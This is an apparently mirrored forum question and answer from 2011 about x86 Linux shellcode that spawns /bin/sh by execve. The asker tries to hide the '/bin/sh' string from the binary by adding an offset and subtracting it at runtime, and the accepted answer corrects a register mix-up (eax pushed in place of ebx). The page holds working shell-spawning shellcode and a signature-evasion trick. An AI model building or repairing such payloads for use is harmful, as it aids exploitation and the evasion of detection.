Segmentation fault by replacing an instruction with another that does the same job. Why?
Question
I have this working shellcode that spawns a shell I have to modify it such that I hide "/bin/sh" or "sh" coming anywhere in the binary after compiling. I have hence thought of taking the hex value of /bin/sh(2f 62 69 6e 2f 73 68) adding some random value to it say 0x11111 and moving that value to a register, subtracting 0x11111 at runtime and then pushing that runtime generated value(which becomes /bin/sh) into the stack and doing an execv But i get a segmentation fault on the 1st step itself. and i am unable to figure out why?
This below code works fine.
section .data
section .text
global _start
_start:
xor eax,eax
cdq
push eax
push long 0x68732f2f
push long 0x6e69622f
mov ebx,esp
push eax
push ebx
mov ecx,esp
mov al,0xb
xor edx,edx
int 0x80
But this change causes a segmentation fault
section .data
section .text
global _start
_start:
xor eax,eax
cdq
push eax
mov ecx,0x11111
mov ebx,0x68744040
sub ebx,ecx
push long eax
push long 0x6e69622f
mov ebx,esp
push eax
push ebx
mov ecx,esp
mov al,0xb
xor edx,edx
int 0x80
Please help me on thie. Will be greatful. Thanks
1 answers
solution1
1 ACCPTED 2011-10-10 20:07:31
The code is different, isn't it? Look here:
sub ebx,ecx
push long eax
You compute ebx-ecx , but push eax . And eax is zero.
It should be:
sub ebx,ecx
push long ebx
The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.